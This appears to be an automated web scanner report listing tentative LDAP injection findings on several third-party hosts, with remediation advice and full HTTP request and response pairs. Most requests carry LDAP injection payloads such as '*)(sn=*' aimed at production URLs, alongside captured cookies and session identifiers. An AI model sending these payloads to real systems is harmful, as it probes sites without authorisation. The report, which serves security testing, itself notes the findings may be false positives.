LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://onlinefamily.norton.com
Path:   /familysafety/basicpremium.fs

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads 2e38829777b43edb)(sn=* and 2e38829777b43edb)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /familysafety/2e38829777b43edb)(sn=* HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:45:51 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:51 GMT; Path=/
Set-Cookie: JSESSIONID=C2C885DF4F91960B21A89E36D3D5E6F7; Path=/familysafety
Content-Length: 1420
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding








<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Norton Online Family</title>
   <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" />
   <style type="text/css">                    
       h2 {
           font-size:32px;
       }
       p {
           font-size:15px;
       }
       h2,p {
           margin:1.2em 0;
       }
       #wrap {
           width:1000px;
           min-height:480px;
           *height:480px;
           margin:0 auto;
           background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px;
       }
   </style>
   <script type="text/javascript">
       if(window.parent.location != document.location)
       {
           window.parent.location = document.location;
       }        
   </script>    
</head>

<body>
   <div id="wrap">
       <div style="padding:150px 0 0 360px;">
           <h2>Sorry, this page is not found.</h2>
           <p>The page you are looking for might have been removed or is temporarily unavailable.</p>
           <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p>
           
           
   
           
           
       </div>
   </div>
</body>
</html>

Request 2

GET /familysafety/2e38829777b43edb)!(sn=* HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:45:52 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:52 GMT; Path=/
Content-Length: 1420
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding








<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Norton Online Family</title>
   <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" />
   <style type="text/css">                    
       h2 {
           font-size:32px;
       }
       p {
           font-size:15px;
       }
       h2,p {
           margin:1.2em 0;
       }
       #wrap {
           width:1000px;
           min-height:480px;
           *height:480px;
           margin:0 auto;
           background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px;
       }
   </style>
   <script type="text/javascript">
       if(window.parent.location != document.location)
       {
           window.parent.location = document.location;
       }        
   </script>    
</head>

<body>
   <div id="wrap">
       <div style="padding:150px 0 0 360px;">
           <h2>Sorry, this page is not found.</h2>
           <p>The page you are looking for might have been removed or is temporarily unavailable.</p>
           <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p>
           
           
   
           
           
       </div>
   </div>
</body>
</html>

1.2. http://player.ooyala.com/player.js [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The height parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the height parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /player.js?width=356&height=*)(sn=*&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response 1

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:25 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-2b01f44a
X-Pad: avoid browser bug
Content-Length: 25976
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:26 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer434126523_10kbk3a&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=bdlRvCl0lGMCXqu1NQ3yMjViV6g03sK3MpF9NIg4Jgw&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:func
...[SNIP]...

Request 2

GET /player.js?width=356&height=*)!(sn=*&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response 2

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:26 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-cfd6a4a3
X-Pad: avoid browser bug
Content-Length: 26000
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:27 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer723342756_10kbk3b&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=qy1TVnNRkIaAk3DIEJXYxG8EmEV0w4W9%2BQyBYG%2BD2tQ&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:
...[SNIP]...

1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The PV%21pageLoadTime parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the PV%21pageLoadTime parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)(sn=*&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:35:11 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:11 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)!(sn=*&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:12 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The SV%21language parameter appears to be vulnerable to LDAP injection attacks.

The payloads cee83379ee2249f6)(sn=* and cee83379ee2249f6)!(sn=* were each submitted in the SV%21language parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)(sn=*&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)!(sn=*&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:09 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The defInvite parameter appears to be vulnerable to LDAP injection attacks.

The payloads 23e555a7c9acdf94)(sn=* and 23e555a7c9acdf94)!(sn=* were each submitted in the defInvite parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)(sn=*&activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:37:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:37:49 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:1315604196:-1:-1; expires=Sat, 08-Sep-2012 21:37:49 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)!(sn=*&activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:37:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
